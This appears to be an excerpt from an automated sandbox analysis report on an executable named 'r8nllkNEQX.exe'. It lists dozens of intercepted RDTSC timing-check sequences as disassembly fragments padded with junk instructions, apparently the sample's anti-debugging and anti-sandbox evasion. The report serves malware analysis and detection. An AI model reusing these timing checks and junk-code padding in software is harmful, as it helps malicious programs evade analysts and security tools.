Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE6FE2 second address: BE7067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007FFB28B74671h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 movzx ebx, dx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 4E62A1F9h 0x00000027 mov eax, dword ptr [ebp+12A30519h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FFB28B74668h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 and bx, DA12h 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+12A32C11h] 0x00000054 nop 0x00000055 push eax 0x00000056 jng 00007FFB28B74671h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FFB28B7466Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE914E second address: BE9153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE808 second address: BEE811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE811 second address: BEE817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE817 second address: BEE81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE81C second address: BEE854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FFB28DE2A0Ah 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FFB28DE2A14h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96B9B second address: B96B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96B9F second address: B96BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FFB28DE2A06h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96BB0 second address: B96BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96BB5 second address: B96C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFB28DE2A06h 0x00000009 jmp 00007FFB28DE2A11h 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FFB28DE2A10h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FFB28DE2A15h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push esi 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96C03 second address: B96C0F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFB28B74666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96C0F second address: B96C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF50F1 second address: BF50F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF50F8 second address: BF5100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF5100 second address: BF5104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF486F second address: BF4875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4875 second address: BF487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A0B second address: BF4A20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FFB28DE2A06h 0x0000000d jbe 00007FFB28DE2A06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A20 second address: BF4A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A26 second address: BF4A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jc 00007FFB28DE2A0Ch 0x0000000c jno 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A3C second address: BF4A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A42 second address: BF4A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CB7 second address: BF4CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CBD second address: BF4CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FFB28DE2A0Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CD2 second address: BF4CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FFB28B74666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CDD second address: BF4CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF9746 second address: BF974D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99B7 second address: BF99BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99BB second address: BF99C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99C1 second address: A20AC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jmp 00007FFB28DE2A13h 0x00000010 push dword ptr [ebp+12A311D5h] 0x00000016 jne 00007FFB28DE2A0Dh 0x0000001c call dword ptr [ebp+12A31D0Ah] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+12A31971h], eax 0x00000029 xor eax, eax 0x0000002b jmp 00007FFB28DE2A0Eh 0x00000030 sub dword ptr [ebp+12A31971h], edi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+12A31971h], ebx 0x00000040 mov dword ptr [ebp+12A32AD5h], eax 0x00000046 pushad 0x00000047 or ecx, dword ptr [ebp+12A32B21h] 0x0000004d sub ecx, dword ptr [ebp+12A32C19h] 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007FFB28DE2A14h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007FFB28DE2A15h 0x00000067 lodsw 0x00000069 cmc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FFB28DE2A0Fh 0x00000073 mov dword ptr [ebp+12A31971h], ebx 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e mov ebx, dword ptr [ebp+12A32C3Dh] 0x00000084 adc edi, 7DC0B4F0h 0x0000008a popad 0x0000008b nop 0x0000008c push ebx 0x0000008d jg 00007FFB28DE2A12h 0x00000093 pop ebx 0x00000094 push eax 0x00000095 pushad 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B8298C second address: B829C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74670h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFB28B74678h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFDF73 second address: BFDF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFDF7B second address: BFDF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFE56A second address: BFE589 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB28DE2A08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFB28DE2A18h 0x00000012 push ebx 0x00000013 jmp 00007FFB28DE2A0Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEAC second address: BFEEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEB2 second address: BFEEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEB8 second address: BFEEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFF049 second address: BFF04E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01D94 second address: C01DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01DB2 second address: C01DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFB28DE2A0Ch 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01DC8 second address: C01DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 je 00007FFB28B74666h 0x0000000c jbe 00007FFB28B74666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A29 second address: B87A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FFB28DE2A06h 0x0000000d je 00007FFB28DE2A06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A3C second address: B87A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A42 second address: B87A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A61 second address: C05A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A65 second address: C05A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A69 second address: C05A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FFB28B74674h 0x00000011 pop ebx 0x00000012 jmp 00007FFB28B7466Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A97 second address: C05AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9511F second address: B9512E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FFB28B74666h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1B4 second address: C0B1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A16h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1CF second address: C0B1D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1D7 second address: C0B1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1EC second address: C0B1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A6DD second address: C0A6E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A96B second address: C0A96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A96F second address: C0A989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FFB28DE2A12h 0x0000000e jc 00007FFB28DE2A06h 0x00000014 jc 00007FFB28DE2A06h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A989 second address: C0A98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB0C second address: C0AB31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ah 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB28DE2A0Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB31 second address: C0AB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB37 second address: C0AB3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0ACAC second address: C0ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0ACB0 second address: C0ACB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C7E9 second address: C0C81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FFB28B74666h 0x0000000a jmp 00007FFB28B74676h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFB28B7466Ch 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C81A second address: C0C826 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB28DE2A06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C826 second address: C0C84C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FFB28B74666h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFB28B74677h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7109 second address: BD7110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7110 second address: BD7158 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFB28B7466Ch 0x00000008 js 00007FFB28B74666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 07A7A061h 0x00000017 mov dword ptr [ebp+12A32508h], ecx 0x0000001d call 00007FFB28B74675h 0x00000022 add dword ptr [ebp+12A358C0h], esi 0x00000028 pop edi 0x00000029 push 49617F84h 0x0000002e push eax 0x0000002f push edx 0x00000030 je 00007FFB28B74668h 0x00000036 push edx 0x00000037 pop edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD78B8 second address: BD78EA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 4B9CA800h 0x00000010 push 0000001Eh 0x00000012 mov dword ptr [ebp+12A31DB6h], ebx 0x00000018 nop 0x00000019 jl 00007FFB28DE2A0Eh 0x0000001f ja 00007FFB28DE2A08h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push ecx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7C38 second address: BD7C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007FFB28B7467Ah 0x00000012 push edx 0x00000013 jmp 00007FFB28B74672h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FFB28B74668h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C10039 second address: C10058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A12h 0x00000007 pushad 0x00000008 jnc 00007FFB28DE2A06h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C10439 second address: C1043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C16A5A second address: C16A60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15564 second address: C15576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FFB28B74666h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15851 second address: C15856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15856 second address: C1586A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Eh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C159D8 second address: C159DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C159DC second address: C159E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C159E2 second address: C15A0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FFB28DE2A06h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007FFB28DE2A19h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C15B52 second address: C15B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74670h 0x00000009 jmp 00007FFB28B74673h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C15B79 second address: C15B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FFB28DE2A06h 0x00000011 jmp 00007FFB28DE2A0Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C16145 second address: C16186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFB28B7467Ah 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jne 00007FFB28B74666h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d js 00007FFB28B74666h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C16186 second address: C161A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe RDTSC instruction interceptor: First address: C1644C second address: C16478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jns 00007FFB28B7467Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jg 00007FFB28B74666h 0x00000016 rdtsc
